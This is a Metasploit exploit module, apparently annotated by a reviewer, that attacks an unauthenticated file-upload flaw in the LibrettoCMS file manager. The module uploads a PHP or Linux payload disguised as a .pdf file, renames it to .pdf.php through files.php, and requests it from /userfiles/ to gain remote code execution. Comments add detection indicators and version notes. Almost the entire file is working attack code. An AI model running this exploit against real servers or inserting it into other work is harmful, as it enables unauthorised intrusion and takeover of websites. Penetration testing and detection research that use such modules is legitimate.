Path: blob/master/modules/exploits/unix/webapp/libretto_upload_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated file upload in the LibrettoCMS file manager (pgrfilemanager,
# bundled under the CKEditor plugin tree). The module uploads a payload under a
# permitted extension, renames it server-side so it ends in .php, and then
# requests it from the web root.
#
# NOTE(review): the description below names LibrettoCMS 1.1.7 while the default
# TARGETURI path refers to "librettoCMS_v.2.2.2"; the affected-version range
# should be confirmed against the referenced advisories.
#
# Detection note: the observable request sequence is an unauthenticated POST to
# .../pgrfilemanager/php/upload.php (multipart, ?type=all files), a POST to
# .../pgrfilemanager/php/files.php with fun=renameFile, and a GET under
# /userfiles/ for a name ending in ".pdf.php".
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata, targets and the TARGETURI option.
  #
  # @param info [Hash] framework-supplied module info merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name'           => "LibrettoCMS File Manager Arbitary File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a file upload vulnerability found in LibrettoCMS 1.1.7, and
          possibly prior. Attackers can bypass the file extension check and abuse the upload
          feature in order to upload a malicious PHP file without authentication, which
          results in arbitrary remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'CWH',
          'sinn3r' #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '94391'],
          ['EDB', '26213']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'Platform'       => %w{ linux php },
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-06-14',
      'DefaultTarget'  => 0))

    register_options(
      [
        # Base path of the LibrettoCMS install; all other URIs are built under it.
        OptString.new('TARGETURI', [true, 'The base path to LibrettoCMS', '/librettoCMS_v.2.2.2/'])
      ])
  end

  # Fingerprints the target by fetching TARGETURI and looking for the
  # "Powered by ... Libretto CMS" footer link.
  #
  # @return [Exploit::CheckCode] Unknown when no response arrives, Detected when
  #   the footer matches, Safe otherwise. The check only proves the product is
  #   present, not that the vulnerable file manager is reachable.
  def check
    res = send_request_raw({'uri' => normalize_uri(target_uri.path)})
    if not res
      vprint_error("Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    # Version is not parsed here, so a patched install is still reported as Detected.
    if res.body =~ /Powered by <a href=".+">Libretto CMS/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end


  # Uploads the payload through the file manager's upload.php endpoint.
  #
  # The file is submitted with a ".pdf" name (an extension the manager accepts)
  # and is renamed to ".php" afterwards by #rename; this two-step sequence is
  # what bypasses the extension check described in the module info.
  #
  # @param base [String] TARGETURI path the file-manager URIs are built under
  # @return [String] the random ".pdf" filename the payload was stored as
  # @raise [Msf::Exploit::Failed] via fail_with when the request times out or
  #   the server answers anything other than 200
  def upload(base)
    # Note: the local `p` shadows Kernel#p inside this method.
    p = get_write_exec_payload(:unlink_self=>true)
    fname = "#{Rex::Text.rand_text_alpha(6)}.pdf"

    # Three multipart parts: the form's Filename field, the file itself, and
    # the submit button; the boundary is supplied by Rex::MIME::Message.
    data = Rex::MIME::Message.new
    data.add_part(fname, nil, nil, "form-data; name=\"Filename\"")
    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{fname}\"")
    data.add_part('Submit Query', nil, nil, 'form-data; name="Upload"')
    post_data = data.to_s

    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'upload.php')

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => uri,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data,
      # The query-string "type" selects the manager's "all files" category.
      'vars_get' => {'type'=>'all files'}
    })

    # Only the HTTP status is checked; the response body is not inspected, so a
    # 200 with an application-level error would not be caught here.
    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
    elsif res.code.to_i != 200
      fail_with(Failure::UnexpectedReply, "#{peer} - Unknown reply: #{res.code.to_s}")
    end

    fname
  end


  # Renames the uploaded ".pdf" file to a ".pdf.php" name through files.php's
  # renameFile function, which (per the module description) does not re-apply
  # the extension filter.
  #
  # @param base [String] TARGETURI path the file-manager URIs are built under
  # @param original_fname [String] filename returned by #upload
  # @return [String] the new ".pdf.php" filename
  # @raise [Msf::Exploit::Failed] via fail_with on timeout or when the JSON
  #   reply does not contain "res":"OK"
  def rename(base, original_fname)
    new_name = "#{Rex::Text.rand_text_alpha(5)}.pdf.php"
    uri = normalize_uri(base, 'adm', 'ui', 'js', 'ckeditor', 'plugins', 'pgrfilemanager', 'php', 'files.php')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'vars_get'  => { 'type' => 'all files' },
      'vars_post' => {
        'fun'         => 'renameFile',
        'dir'         => '',
        'filename'    => original_fname,
        'newFilename' => new_name
      }
    })

    # Success is judged by a substring match on the JSON body rather than by
    # parsing it; the HTTP status is not checked in this step.
    if not res
      fail_with(Failure::Unknown, "#{peer} - Request timed out while renaming")
    elsif res.body !~ /"res":"OK"/
      fail_with(Failure::Unknown, "#{peer} - Failed to rename file")
    end

    new_name
  end


  # Requests the renamed file from the userfiles/ directory so the server
  # executes it.
  #
  # Only a 404 is treated as failure; a missing response (nil) is tolerated,
  # presumably because the payload may not return a normal HTTP reply.
  # Note: this method name shadows Kernel#exec within the class.
  #
  # @param base [String] TARGETURI path
  # @param payload_fname [String] filename returned by #rename
  # @return [void]
  # @raise [Msf::Exploit::Failed] via fail_with when the server answers 404
  def exec(base, payload_fname)
    res = send_request_cgi({ 'uri' => normalize_uri(base, 'userfiles', payload_fname) })
    if res and res.code.to_i == 404
      fail_with(Failure::NotFound, "#{peer} - Not found: #{payload_fname}")
    end
  end


  # Entry point: upload, rename, then request the payload. Each step reports
  # failure through fail_with, so a failed step stops the sequence.
  def exploit
    base = target_uri.path

    print_status("Uploading malicious file...")
    orig_fname = upload(base)

    print_status("Renaming #{orig_fname}...")
    new_fname = rename(base, orig_fname)

    print_status("Executing #{new_fname}...")
    exec(base, new_fname)
  end
end